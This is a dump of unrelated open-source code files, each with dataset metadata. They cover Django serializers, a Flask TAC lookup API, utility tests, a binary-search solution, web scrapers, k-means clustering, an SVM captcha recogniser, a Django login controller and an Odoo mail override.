import serializers\n\nfrom assessment.serializers import AssessmentMiniSerializer\nfrom utils.helper import SerializerHelper\n\nfrom myuser.serializers import HAWCUserSerializer\nfrom . import models\n\n\nclass AssessmentMetricChoiceSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.RiskOfBiasMetric\n fields = ('id', 'name', 'description')\n\n\nclass AssessmentMetricSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.RiskOfBiasMetric\n fields = '__all__'\n\n\nclass AssessmentDomainSerializer(serializers.ModelSerializer):\n metrics = AssessmentMetricSerializer(many=True)\n\n class Meta:\n model = models.RiskOfBiasDomain\n fields = '__all__'\n\n\nclass RiskOfBiasDomainSerializer(serializers.ModelSerializer):\n assessment = AssessmentMiniSerializer(read_only=True)\n\n class Meta:\n model = models.RiskOfBiasDomain\n fields = '__all__'\n\n\nclass RiskOfBiasMetricSerializer(serializers.ModelSerializer):\n domain = RiskOfBiasDomainSerializer(read_only=True)\n\n class Meta:\n model = models.RiskOfBiasMetric\n fields = '__all__'\n\n\nclass RiskOfBiasScoreSerializer(serializers.ModelSerializer):\n metric = RiskOfBiasMetricSerializer(read_only=True)\n\n def to_representation(self, instance):\n ret = super().to_representation(instance)\n ret['score_description'] = instance.get_score_display()\n ret['score_symbol'] = instance.score_symbol\n ret['score_shade'] = instance.score_shade\n ret['url_edit'] = instance.riskofbias.get_edit_url()\n ret['study_name'] = instance.riskofbias.study.short_citation\n ret['study_id'] = instance.riskofbias.study.id\n ret['study_types'] = instance.riskofbias.study.get_study_type()\n return ret\n\n class Meta:\n model = models.RiskOfBiasScore\n fields = ('id', 'score', 'notes', 'metric')\n\n\nclass RiskOfBiasSerializer(serializers.ModelSerializer):\n scores = RiskOfBiasScoreSerializer(read_only=False, many=True, partial=True)\n author = HAWCUserSerializer(read_only=True)\n\n class Meta:\n model = models.RiskOfBias\n fields = ('id', 'author', 'active',\n 'final', 'study', 'created',\n 'last_updated', 'scores')\n\n def update(self, instance, validated_data):\n \"\"\"\n Updates the nested RiskOfBiasScores with submitted data before updating\n the RiskOfBias instance.\n \"\"\"\n score_data = validated_data.pop('scores')\n for score, form_data in zip(instance.scores.all(), score_data):\n for field, value in list(form_data.items()):\n setattr(score, field, value)\n score.save()\n return super().update(instance, validated_data)\n\n\nclass AssessmentMetricScoreSerializer(serializers.ModelSerializer):\n scores = serializers.SerializerMethodField('get_final_score')\n\n class Meta:\n model = models.RiskOfBiasMetric\n fields = ('id', 'name', 'description', 'scores')\n\n def get_final_score(self, instance):\n scores = instance.scores.filter(riskofbias__final=True, riskofbias__active=True)\n serializer = RiskOfBiasScoreSerializer(scores, many=True)\n return serializer.data\n\n\nclass AssessmentRiskOfBiasScoreSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.RiskOfBiasScore\n fields = ('id', 'notes', 'score')\n\nSerializerHelper.add_serializer(models.RiskOfBias, RiskOfBiasSerializer)\n","sub_path":"project/riskofbias/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"273272631","text":"\"\"\"\nDIRBS REST-ful TAC API module.\n\nCopyright (c) 2018 Qualcomm Technologies, Inc.\n\n All 
rights reserved.\n\n\n\n Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the\n limitations in the disclaimer below) provided that the following conditions are met:\n\n\n * Redistributions of source code must retain the above copyright notice, this list of conditions and the following\n disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following\n disclaimer in the documentation and/or other materials provided with the distribution.\n\n * Neither the name of Qualcomm Technologies, Inc. nor the names of its contributors may be used to endorse or promote\n products derived from this software without specific prior written permission.\n\n NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY\n THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR\n TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nfrom flask import abort, jsonify\nfrom marshmallow import Schema, fields, pre_dump\n\nfrom dirbs.api.common.db import get_db_connection\n\n\ndef api(tac):\n \"\"\"TAC API endpoint (version 1).\"\"\"\n if len(tac) != 8:\n abort(400, 'Bad TAC format')\n\n try:\n int(tac)\n except ValueError:\n abort(400, 'Bad TAC format')\n\n with get_db_connection() as db_conn, db_conn.cursor() as cursor:\n cursor.execute('SELECT * FROM gsma_data WHERE tac = %s', [tac])\n rec = cursor.fetchone()\n\n if rec is None:\n return jsonify(GSMATacInfo().dump(dict(tac=tac, gsma=None)).data)\n return jsonify(GSMATacInfo().dump(dict(tac=tac, gsma=rec._asdict())).data)\n\n\nclass TacApi:\n \"\"\"TAC API version 2 methods.\"\"\"\n\n @staticmethod\n def _validate_tac(val):\n \"\"\"Validate TAC input argument format.\"\"\"\n if len(val) != 8:\n abort(400, 'Bad TAC format')\n\n try:\n int(val)\n except ValueError:\n abort(400, 'Bad Tac format')\n\n def get(self, tac):\n \"\"\"TAC GET API endpoint (version 2).\"\"\"\n self._validate_tac(tac)\n with get_db_connection() as db_conn, db_conn.cursor() as cursor:\n cursor.execute(\"\"\"SELECT tac, manufacturer, bands, allocation_date, model_name, device_type,\n optional_fields\n FROM gsma_data\n WHERE tac = %s\"\"\", [tac])\n gsma_data = cursor.fetchone()\n print(gsma_data)\n return jsonify(TacInfo().dump(dict(tac=tac,\n gsma=gsma_data._asdict() if gsma_data is not None else None)).data)\n\n def post(self, **kwargs):\n \"\"\"TAC POST API endpoint (version 2).\"\"\"\n if kwargs is not None:\n tacs = kwargs.get('tacs')\n if tacs is not None:\n tacs = list(set(tacs))\n else:\n abort(400, 'Bad TAC Input format.')\n\n if tacs is not None:\n if not len(tacs) > 1000 and not len(tacs) == 0:\n with get_db_connection() as db_conn, db_conn.cursor() as cursor:\n cursor.execute(\"\"\"SELECT tac, manufacturer, bands, allocation_date, model_name, device_type,\n optional_fields\n 
FROM gsma_data\n WHERE tac IN %(tacs)s\"\"\", {'tacs': tuple(tacs)})\n gsma_data = cursor.fetchall()\n response = []\n for rec in gsma_data:\n response.append(TacInfo().dump(dict(tac=rec.tac,\n gsma=rec._asdict())).data)\n existing_tacs = [res['tac'] for res in response]\n for tac in tacs:\n if tac not in existing_tacs:\n response.append(TacInfo().dump(dict(tac=tac, gsma=None)).data)\n return jsonify({'results': response})\n abort(400, 'Bad TAC Input format (Minimum 1 & Maximum 1000 allowed).')\n abort(400, 'Bad TAC Input format.')\n abort(400, 'Bad TAC Input format.')\n\n\nclass GSMA(Schema):\n \"\"\"Defines the GSMA schema for API V1.\"\"\"\n\n marketing_name = fields.String()\n internal_model_name = fields.String()\n manufacturer = fields.String()\n bands = fields.String()\n allocation_date = fields.String()\n country_code = fields.String()\n fixed_code = fields.String()\n manufacturer_code = fields.String()\n radio_interface = fields.String()\n brand_name = fields.String()\n model_name = fields.String()\n operating_system = fields.String()\n nfc = fields.String()\n bluetooth = fields.String()\n wlan = fields.String()\n device_type = fields.String()\n\n @pre_dump(pass_many=False)\n def extract_fields(self, data):\n \"\"\"Flatten the optional_fields to schema fields.\"\"\"\n for key in data['optional_fields']:\n data[key] = data['optional_fields'][key]\n\n\nclass GSMAV2(Schema):\n \"\"\"Defines the GSMA schema for API V2.\"\"\"\n\n allocation_date = fields.String()\n bands = fields.String()\n brand_name = fields.String()\n device_type = fields.String()\n internal_model_name = fields.String()\n manufacturer = fields.String()\n marketing_name = fields.String()\n model_name = fields.String()\n bluetooth = fields.String()\n nfc = fields.String()\n wlan = fields.String()\n radio_interface = fields.String()\n\n @pre_dump(pass_many=False)\n def extract_fields(self, data):\n \"\"\"Map optional fields to corresponding schema fields.\"\"\"\n for key in data['optional_fields']:\n data[key] = data['optional_fields'][key]\n\n\nclass GSMATacInfo(Schema):\n \"\"\"Defines the schema for TAC API(version 1) response.\"\"\"\n\n tac = fields.String(required=True)\n gsma = fields.Nested(GSMA, required=True)\n\n\nclass TacInfo(Schema):\n \"\"\"Defines the schema for TAC API(version 2) response.\"\"\"\n\n tac = fields.String(required=True)\n gsma = fields.Nested(GSMAV2, required=True)\n\n\nclass BatchTacInfo(Schema):\n \"\"\"Defines schema for Batch TAC API version 2 response.\"\"\"\n\n results = fields.List(fields.Nested(TacInfo, required=True))\n\n\nclass TacArgs(Schema):\n \"\"\"Input args for TAC POST API (version 2).\"\"\"\n\n # noinspection PyProtectedMember\n tacs = fields.List(fields.String(required=True, validate=TacApi._validate_tac))\n\n @property\n def fields_dict(self):\n \"\"\"Convert declared fields to dictionary.\"\"\"\n return self._declared_fields\n","sub_path":"src/dirbs/api/common/tac.py","file_name":"tac.py","file_ext":"py","file_size_in_byte":7407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"135780051","text":"import re\n\nimport bel.utils as utils\n\n\ndef test_get_url():\n\n url = \"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pubmed&retmode=xml&id=19894120\"\n\n # with pytest.raises(requests.exceptions.Timeout):\n # r = utils.get_url(url, timeout=0.0001)\n\n r = utils.get_url(url)\n r = utils.get_url(url)\n assert r.from_cache\n\n\ndef test_first_true():\n\n test1 = [False, 1, \"2\", None]\n test2 = [None, \"\", 
\"2\", None]\n test3 = [None, False, \"\"]\n\n result = utils.first_true(test1)\n assert result == 1\n\n result = utils.first_true(test2)\n assert result == \"2\"\n\n # Result is the default value '3'\n result = utils.first_true(test3, \"3\")\n assert result == \"3\"\n\n\ndef test_create_hash():\n\n h = utils._create_hash(\"test\")\n assert h == \"8581389452482819506\"\n\n\ndef test_generate_id():\n\n _id = utils._generate_id()\n assert re.match(\"\\w{26,26}\", str(_id))\n","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"191354723","text":"\"\"\"\n给定一个排序数组和一个目标值,在数组中找到目标值,并返回其索引。如果目标值不存在于数组中,返回它将会被按顺序插入的位置。\n你可以假设数组中无重复元素。\n\n示例 1:\n输入: [1,3,5,6], 5\n输出: 2\n\n示例 2:\n输入: [1,3,5,6], 2\n输出: 1\n\n示例 3:\n输入: [1,3,5,6], 7\n输出: 4\n\n示例 4:\n输入: [1,3,5,6], 0\n输出: 0\n\"\"\"\n\n\nclass Solution:\n def searchInsert(self, nums: List[int], target: int) -> int:\n start = 0\n end = len(nums) - 1\n while start <= end:\n mid = start + (end - start) // 2\n if target < nums[mid]:\n if mid == 0 or target > nums[mid - 1]:\n return mid\n else:\n end = mid - 1\n elif target > nums[mid]:\n if mid == len(nums) - 1 or target < nums[mid + 1]:\n return mid + 1\n else:\n start = mid + 1\n else:\n return mid\n\n","sub_path":"LeedCode/二分搜索/35. 搜索插入位置.py","file_name":"35. 搜索插入位置.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"371550818","text":"import logging.handlers\nimport os\n\n# log文件位置\nlog_path = \"./Log\" + os.sep + \"hmx.log\"\n\n\ndef log_config():\n \"\"\"初始化日志配置\"\"\"\n # 日志器\n logger = logging.getLogger()\n # 设置级别\n logger.setLevel(logging.INFO)\n\n # 处理器 -控制台\n sh = logging.StreamHandler()\n # 处理器 -文件\n trf = logging.handlers.TimedRotatingFileHandler(filename=log_path, when=\"midnight\",\n interval=1, backupCount=7, encoding=\"utf-8\")\n # 格式化字符串\n fmt = \"%(asctime)s - %(levelname)s- [%(filename)s -%(lineno)d -%(funcName)s ] -%(message)s \"\n # 格式化器\n formatter = logging.Formatter(fmt)\n\n # 处理器-控制台 添加 格式化器\n sh.setFormatter(formatter)\n # 处理器-文件 添加 格式化器\n trf.setFormatter(formatter)\n\n # 日志器 添加 处理器-控制台\n logger.addHandler(sh)\n # 日志器 添加 处理器-文件\n logger.addHandler(trf)\n","sub_path":"Utils/logConf.py","file_name":"logConf.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"430279029","text":"\nimport webapp2\nfrom webapp2_extras import json\nimport logging\nfrom google.appengine.api import datastore\nfrom google.appengine.ext import ndb\nfrom dbentities import *\n\n\nclass MoveHandler(webapp2.RequestHandler):\n\tdef post(self):\n\t\tlogging.info(\" <<<<<<<<< POST, MoveHandler >>>>>>>>>>>>>\")\n\n\t\trb_dict = json.decode(self.request.body)\n\t\tmsg = \"big game exists\" + str(rb_dict.get('game').get('id'))\n\t\t# rb_dict.get('game').get('message') = \"back from server\"\n\t\trb_dict['game']['message'] = \"back from server\"\n\n\n\n\t\tq = Game.query(Game.gameid == rb_dict['game']['id'])\n\t\tqfetch = q.fetch()\n\t\tif len(qfetch) == 0:\n\t\t\tlogging.info(\"qfetch == 0\")\n\t\t\tgameObj = Game()\n\t\t\tgameObj.gameid = rb_dict['game']['id']\n\t\t\tgameObj.turn = rb_dict['game']['turn']\n\t\t\tgameObj.turnnum = rb_dict['game']['turnnum']\n\t\t\tgameObj.wplayer = rb_dict['game']['wplayer']\n\t\t\tgameObj.bplayer = rb_dict['game']['bplayer']\n\t\t\tgameObj.game 
= rb_dict['game']\n\t\telse:\n\t\t\tlogging.info(\"qfetch != 0\")\n\t\t\tgameObj = qfetch[0]\n\t\t\tgameObj.turn = rb_dict['game']['turn']\n\t\t\tgameObj.turnnum = rb_dict['game']['turnnum']\n\t\t\tgameObj.game = rb_dict['game']\n\n\t\tgameObj.state = gameObj.turn\n\t\tgameObj.put()\n\n\t\trspObj = {\n\t\t\t\t'rsp' : 'ok',\n\t\t\t\t'msg': msg\n\t\t\t}\n\t\t# assemble and send the response \n\t\tself.response.content_type = 'application/json'\n\t\tself.response.write(json.encode(rb_dict))\n","sub_path":"gameservice/move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"230052706","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\n# pip install requests\r\n# pip install bs4\r\n\r\ndef getAllCategoryLinks():\r\n returnMap = {}\r\n r = requests.get('https://www.blocktempo.com/')\r\n soup = BeautifulSoup(r.text, 'html.parser')\r\n menus = soup.select('ul[class=\"sub-menu\"] li')\r\n for menu in menus:\r\n returnMap[menu.get_text()] = menu.select('a')[0].get('href')\r\n return returnMap\r\n\r\ndef crawl(categoryName, categoryLink):\r\n f = open(categoryName+'.csv', 'a', encoding=\"utf8\")\r\n r = requests.get(categoryLink)\r\n soup = BeautifulSoup(r.text, 'html.parser')\r\n page_number = int(soup.select('a[class=\"page_number\"]')[-1].get_text())\r\n for page in range(1, page_number+1):\r\n r = requests.get(categoryLink+'page/'+str(page))\r\n soup = BeautifulSoup(r.text, 'html.parser')\r\n postElements = soup.select('article[class=\"jeg_post jeg_pl_lg_2 format-standard\"]')\r\n for post in postElements:\r\n title = post.select('h3[class=\"jeg_post_title\"]')[0].get_text().replace('\\n', '')\r\n publishDate = post.select('div[class=\"jeg_meta_date\"]')[0].get_text()\r\n author = post.select('div[class=\"jeg_meta_author\"] a')[0].get_text()\r\n #print(title+','+publishDate+','+author)\r\n f.write(publishDate+','+author+','+title+'\\n')\r\n f.flush()\r\n f.close()\r\n\r\nreturnMap = getAllCategoryLinks()\r\nfor key in returnMap.keys():\r\n crawl(key, returnMap[key])","sub_path":"news_title.py","file_name":"news_title.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"460702523","text":"import pickle\nfrom math import sqrt\nimport numpy as np\n\n\n#with open('./data/data.pkl', 'rb') as f:\n# points_list = pickle.load(f)\n\n#test points tuple imported with pickle\n#points_list = [(-107, 630), (-790, -305), (-564, -387), (-181, -68), (330, -474), (-295, -803), (407, -920), (-640, 20), (943, 177), (428, -391), (-62, -335), (964, -98), (-306, -540), (-103, -979), (393, 208), (-94, -689), (497, -273), (201, 903), (965, 416), (-204, -928), (-809, -521), (116, -442), (56, 292), (-1, -604), (-241, 54), (-473, -996), (-61, -70), (-496, -354), (443, 539), (-786, 905), (620, 581), (-547, 588), (320, 102), (643, 964), (-696, 219), (-449, -941), (685, 640), (-763, -178), (120, 638), (-419, -894), (826, -216), (-583, -731), (-909, 170), (848, -749), (156, 946), (595, -172), (436, 93), (561, 48), (535, -868), (-507, 424)]\n\n\n# We first need to define a Point class with all the operations of a 3D point.\nclass Point(object):\n\n def __init__(self, x, y, z):\n self.x = x\n self.y = y\n self.z = z\n\n def __repr__(self):\n return 'Point(%s, %s, %s)' % (self.x,self.y,self.z)\n\n def __add__(self, point):\n\n return Point(self.x + point.x, self.y + point.y, self.z + point.z)\n\n def 
__sub__(self, point):\n\n        return Point(self.x - point.x, self.y - point.y, self.z - point.z)\n\n    def __mul__(self, p):\n        if type(p) == int or type(p) == float:\n            return Point(p*self.x, p*self.y, p*self.z)\n        if type(p) == Point:\n            return int((self.x * p.x) + (self.y*p.y) + (self.z*p.z))\n\n    def distance(self, other):\n\n        return sqrt((self.x - other.x)**2 +(self.y - other.y)**2 + (self.z - other.z)**2)\n\n\nclass Cluster(object):\n    def __init__(self, x, y, z):\n        self.center = Point(x, y, z)\n        self.points = []\n\n    def update(self):\n        temp = Point(0, 0, 0)\n        for point in self.points:\n            temp += point\n        self.center = temp * (1/float(len(self.points)))\n        self.points = []\n\n\n    def add_point(self, point):\n        self.points.append(point)\n\n# We convert the list of tuples representing points to a list of Point Objects.\n#points = [Point(points_list[i][0],points_list[i][1]) for i in range(len(points_list))]\n\n# Note: despite the name, this implements a basic k-means clustering loop.\ndef basic_knn(X, nclusters):\n    # pick random input points as the initial cluster centers\n    clusters = []\n    for i in range(nclusters):\n        index = np.random.choice(len(X))\n        clusters.append(Cluster(X[index].x, X[index].y, X[index].z))\n\n    _old = []\n    for _ in range(10000): # max iterations\n        for point in X:\n            # assign each point to its nearest cluster center\n            dist_list = []\n            for cluster in clusters:\n                dist_list.append(point.distance(cluster.center))\n\n            min_index = dist_list.index(min(dist_list))\n            clusters[min_index].add_point(point)\n\n        # stop once the assignment of the first cluster no longer changes\n        if _old == clusters[0].points:\n            break\n        _old = list(clusters[0].points)\n        for cluster in clusters:\n            cluster.update()\n\n    return [cluster.center for cluster in clusters]\n","sub_path":"clust.py","file_name":"clust.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"508963529","text":"# Imports\nfrom flask import Blueprint, jsonify, request\nfrom services.alimentacao_services import \\\n    listar as service_listar_alimentacao, \\\n    localizar as service_localiza_alimentacao\n\ncoel_alimentacao = Blueprint('coel_alimentacao', __name__)\n\n\n@coel_alimentacao.route('/alimentacao')\ndef listar_alimentacao():\n    lista = service_listar_alimentacao()\n    return jsonify(lista)\n\n\n@coel_alimentacao.route('/alimentacao/<id>', methods=['GET'])\ndef localizar_alimentacao(id):\n    alimentacao = service_localiza_alimentacao(id)\n    if alimentacao is not None:\n        return jsonify(alimentacao)\n    return jsonify({'erro': 'alimentacao nao encontrado'}), 400\n","sub_path":"Backend/routes/routes_alimentacao.py","file_name":"routes_alimentacao.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"67835573","text":"# -*- coding: utf-8 -*-\n'''\nCreated on May 10, 2017\n\n@author: chenyitao\n'''\n\nfrom libsvm.svmutil import *\nfrom .learn_helper import LearnHelper\n\n\nclass IdentityHelper(object):\n\n    models = {}\n\n    @staticmethod\n    def get_feature(filename, default_size=(12, 20), threshold=140):\n        sub_imgs = LearnHelper.cut_image(filename, default_size, threshold)\n        name = filename.split('/')[-1].split('.')[0]\n        yt = []\n        xt = []\n        for index, sub_img in enumerate(sub_imgs):\n            label = ord(name[index]) * 1.0 \\\n                if len(name) > index and ord(name[index]) >= 97 \\\n                else int(name[index]) * 1.0\n            yt.append(label)\n            feature = LearnHelper.get_feature(sub_img)\n            xt.append({j + 1: f * 1.0 for j, f in enumerate(feature)})\n        return yt, xt\n\n    @staticmethod\n    def get_model(model_file):\n        model = IdentityHelper.models.get(model_file, None)\n        if not model:\n            model = svm_load_model(model_file)\n            IdentityHelper.models[model_file] = model\n        return 
model\n\n @staticmethod\n def identify(filename, model_file, default_size=(12, 20), threshold=140):\n yt, xt = IdentityHelper.get_feature(filename, default_size, threshold)\n model = IdentityHelper.get_model(model_file)\n p_label, (acc, _, _), _ = svm_predict(yt, xt, model)\n result = ''\n if int(acc) < 100:\n return ''\n for item in p_label:\n if int(item) >= 97:\n result += chr(int(item))\n else:\n result += str(int(item))\n return result\n","sub_path":"tools/captcha_identity/helper/identity_helper.py","file_name":"identity_helper.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"273035994","text":"from django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import api_view\nimport json\nfrom datetime import datetime\nfrom django.shortcuts import render\nfrom user.data.request.user_request import UserRequest\nfrom user.service.user_service import User_Service\nimport pytz\nIST = pytz.timezone('Asia/Kolkata')\ndatetime_ist = datetime.now(IST)\ntoday = datetime_ist.strftime('%Y-%m-%d')\n\ndef login_index(request):\n return render(request, 'login.html')\n\ndef signup_index(request):\n return render(request, 'signup.html')\n\n@csrf_exempt\n@api_view(['GET','POST'])\ndef user_fetch(request):\n if request.method == 'GET':\n User_service = User_Service()\n resp_obj = User_service.get_user()\n return HttpResponse(resp_obj.get(), content_type='application/json')\n\n if request.method == 'POST':\n userdata = json.loads(request.body)\n User_service = User_Service()\n data = UserRequest(userdata)\n resp_obj = User_service.insert_user(data,userdata)\n return HttpResponse(resp_obj.get(), content_type='application/json')\n\n@csrf_exempt\n@api_view(['GET'])\ndef user_detail(request,userid):\n if request.method == 'GET':\n User_service = User_Service()\n resp_obj = User_service.get_userdetail(userid)\n return HttpResponse(resp_obj.get(), content_type='application/json')\n\n\n@csrf_exempt\n@api_view(['POST'])\ndef user_login(request):\n if request.method == 'POST':\n userdata = json.loads(request.body)\n User_service = User_Service()\n username= userdata['username']\n password= userdata['password']\n resp_obj = User_service.login_user(username, password)\n data = json.loads(resp_obj.get())\n request.session['empid'] = data.get('message').get('id')\n request.session['empname'] = data.get('message').get('name')\n # request.session['Entity_gid'] = data.data.message.get(id)\n return HttpResponse(resp_obj.get(), content_type='application/json')\n","sub_path":"user/controller/usercontroller.py","file_name":"usercontroller.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"165854002","text":"# Tai Nguyen, Matthew Lisec and Yong Jiang\r\n\r\nimport urllib\r\n# create awesome html\r\ndef openHtml():\r\n return open('C:/Users/lisec/OneDrive/Documents/CST 205/Lab 16/awesome.html', 'wt')\r\n# create new html news\r\ndef createNewHTML():\r\n return open('C:/Users/lisec/OneDrive/Documents/CST 205/Lab 16/mynews.html', 'wt')\r\n\r\ndef main():\r\n\r\n # get html from site\r\n html = urllib.urlopen(\"https://techcrunch.com\")\r\n \r\n # get file to write the news in\r\n file = openHtml()\r\n file.write(html.read())\r\n # save the file\r\n file.close()\r\n \r\n # open the news file\r\n file = open('C:/Users/lisec/OneDrive/Documents/CST 205/Lab 16/awesome.html')\r\n # 
create a new html file containing the parsed news\r\n    newFile = createNewHTML()\r\n    # write the html header for the page\r\n    newFile.write('I made this page with Python!')\r\n    # loop over every line in the html\r\n    for new in file:\r\n        # split to remove all spaces\r\n        newArray = new.split()\r\n        # if length of newArray is more than 2\r\n        if len(newArray) > 2:\r\n            # condition check for title of news (the original markup strings were lost)\r\n            if newArray[0] == '':\r\n                title = new.replace('', '').replace(' ', ' ').replace('’', \"'\")\r\n                # write the title to the html\r\n                newFile.write('' + title + '
')\r\n # get description of new\r\n if newArray[0] == '')\r\n # close and save news html\r\n newFile.close()\r\n ","sub_path":"CST205/Lab 16/lab16.py","file_name":"lab16.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"306162974","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport base64\nimport re\nimport requests\nimport json\n\nfrom odoo import _, api, fields, models, SUPERUSER_ID, tools\nfrom odoo.tools.safe_eval import safe_eval\nfrom odoo.exceptions import UserError\n\n_logger = logging.getLogger(__name__)\n\nclass mail_custom_0(models.TransientModel):\n\n _inherit = 'mail.compose.message'\n\n\n def get_mail_values(self, res_ids):\n \"\"\"Generate the values that will be used by send_mail to create mail_messages\n or mail_mails. \"\"\"\n self.ensure_one()\n results = dict.fromkeys(res_ids, False)\n rendered_values = {}\n mass_mail_mode = self.composition_mode == 'mass_mail'\n\n # render all template-based value at once\n if mass_mail_mode and self.model:\n rendered_values = self.render_message(res_ids)\n # compute alias-based reply-to in batch\n reply_to_value = dict.fromkeys(res_ids, None)\n if mass_mail_mode and not self.no_auto_thread:\n records = self.env[self.model].browse(res_ids)\n reply_to_value = self.env['mail.thread']._notify_get_reply_to_on_records(default=self.email_from, records=records)\n\n blacklisted_rec_ids = []\n if mass_mail_mode and issubclass(type(self.env[self.model]), self.pool['mail.thread.blacklist']):\n BL_sudo = self.env['mail.blacklist'].sudo()\n blacklist = set(BL_sudo.search([]).mapped('email'))\n if blacklist:\n targets = self.env[self.model].browse(res_ids).read(['email_normalized'])\n # First extract email from recipient before comparing with blacklist\n blacklisted_rec_ids.extend([target['id'] for target in targets\n if target['email_normalized'] and target['email_normalized'] in blacklist])\n\n for res_id in res_ids:\n # static wizard (mail.message) values\n \n ##########################\n reply_follower = \"\"\n # ADD REPLY FOLLOWERS\n if(self.model == 'sale.order'):\n sale_order = self.env['sale.order'].search([('id','=', self.res_id)])\n \n emails_follower = []\n if(sale_order.message_follower_ids):\n for partner in sale_order.message_follower_ids.partner_id:\n if(partner.email):\n emails_follower.append(partner.email)\n\n if(emails_follower):\n reply_follower = ','.join(emails_follower)\n \n ##########################\n\n mail_values = {\n 'subject': self.subject,\n 'body': self.body or '',\n 'parent_id': self.parent_id and self.parent_id.id,\n 'partner_ids': [partner.id for partner in self.partner_ids],\n 'attachment_ids': [attach.id for attach in self.attachment_ids],\n 'author_id': self.author_id.id,\n 'email_from': self.email_from,\n 'record_name': self.record_name,\n 'no_auto_thread': self.no_auto_thread,\n 'mail_server_id': self.mail_server_id.id,\n 'mail_activity_type_id': self.mail_activity_type_id.id,\n 'reply_to': reply_follower ###########################\n }\n\n # mass mailing: rendering override wizard static values\n if mass_mail_mode and self.model:\n record = self.env[self.model].browse(res_id)\n mail_values['headers'] = record._notify_email_headers()\n # keep a copy unless specifically requested, reset record name (avoid browsing records)\n mail_values.update(notification=not self.auto_delete_message, model=self.model, res_id=res_id, record_name=False)\n # auto deletion of mail_mail\n if self.auto_delete or 
self.template_id.auto_delete:\n mail_values['auto_delete'] = True\n # rendered values using template\n email_dict = rendered_values[res_id]\n mail_values['partner_ids'] += email_dict.pop('partner_ids', [])\n mail_values.update(email_dict)\n if not self.no_auto_thread:\n mail_values.pop('reply_to')\n if reply_to_value.get(res_id):\n mail_values['reply_to'] = reply_to_value[res_id]\n if self.no_auto_thread and not mail_values.get('reply_to'):\n mail_values['reply_to'] = mail_values['email_from']\n # mail_mail values: body -> body_html, partner_ids -> recipient_ids\n mail_values['body_html'] = mail_values.get('body', '')\n mail_values['recipient_ids'] = [(4, id) for id in mail_values.pop('partner_ids', [])]\n\n # process attachments: should not be encoded before being processed by message_post / mail_mail create\n mail_values['attachments'] = [(name, base64.b64decode(enc_cont)) for name, enc_cont in email_dict.pop('attachments', list())]\n attachment_ids = []\n for attach_id in mail_values.pop('attachment_ids'):\n new_attach_id = self.env['ir.attachment'].browse(attach_id).copy({'res_model': self._name, 'res_id': self.id})\n attachment_ids.append(new_attach_id.id)\n attachment_ids.reverse()\n mail_values['attachment_ids'] = self.env['mail.thread']._message_post_process_attachments(\n mail_values.pop('attachments', []),\n attachment_ids,\n {'model': 'mail.message', 'res_id': 0}\n )['attachment_ids']\n # Filter out the blacklisted records by setting the mail state to cancel -> Used for Mass Mailing stats\n if res_id in blacklisted_rec_ids:\n mail_values['state'] = 'cancel'\n # Do not post the mail into the recipient's chatter\n mail_values['notification'] = False\n\n results[res_id] = mail_values\n return results\n\n @api.onchange('template_id')\n def onchange_template_id_wrapper(self):\n self.ensure_one()\n values = self.onchange_template_id(self.template_id.id, self.composition_mode, self.model, self.res_id)['value']\n for fname, value in values.items():\n setattr(self, 